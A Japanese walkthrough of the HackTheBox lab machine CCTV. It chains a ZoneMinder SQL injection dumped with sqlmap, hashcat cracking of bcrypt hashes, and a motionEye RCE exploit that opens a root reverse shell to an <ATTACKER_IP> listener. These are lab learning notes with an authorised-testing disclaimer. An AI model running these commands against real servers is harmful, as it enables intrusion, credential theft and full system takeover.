
HackTheBox CCTVのwalkthrough。CVE-2024-51482 ZoneMinder SQLインジェクション、bcryptハッシュクラッキング、CVE-2025-60787 motionEye RCEを連鎖させてrootを取得する。
プラットフォーム: HackTheBox | OS: Linux
CVE-2024-51482 を悪用した ZoneMinder の SQL インジェクションにより、データベースから bcrypt ハッシュが漏洩する。hashcat でクラックすると SSH アクセスが得られる。ポートフォワーディングで露出した内部の motionEye インスタンスは CVE-2025-60787 に脆弱であり、root シェルを取得できる。
nmap -sV -sC 10.129.53.160 -Pn
22/tcp open ssh OpenSSH 9.6p1 (Ubuntu)
80/tcp open http Apache 2.4.58 — SecureVision CCTV & Security Solutions
/etc/hosts に cctv.htb を追加した。ポート 80 では ZoneMinder のインストールが稼働していた。
CVE-2024-51482 は ZoneMinder のログインエンドポイントにおける SQL インジェクション脆弱性である。username パラメータがサニタイズされておらず、データベースの抽出が可能となる。
sqlmap -u "http://cctv.htb/zm/index.php" \
--data="username=admin&password=admin&action=login" \
--dbms=mysql --dump --batch
users テーブルから bcrypt パスワードハッシュを抽出した。
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
パスワードをクラックした。
ssh <user>@10.129.53.160
user フラグを取得した。内部サービスを確認した。
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel
ポートをフォワーディングした。
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160
CVE-2025-60787 は motionEye における認証済み RCE である。内部パネルへのアクセスがあれば、任意のコマンドが root として実行される。
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444
root シェルを取得した。root フラグは /root/root.txt にある。
教育目的のみ。所有しているか、明示的なテスト許可を得たシステムのみをテストすること。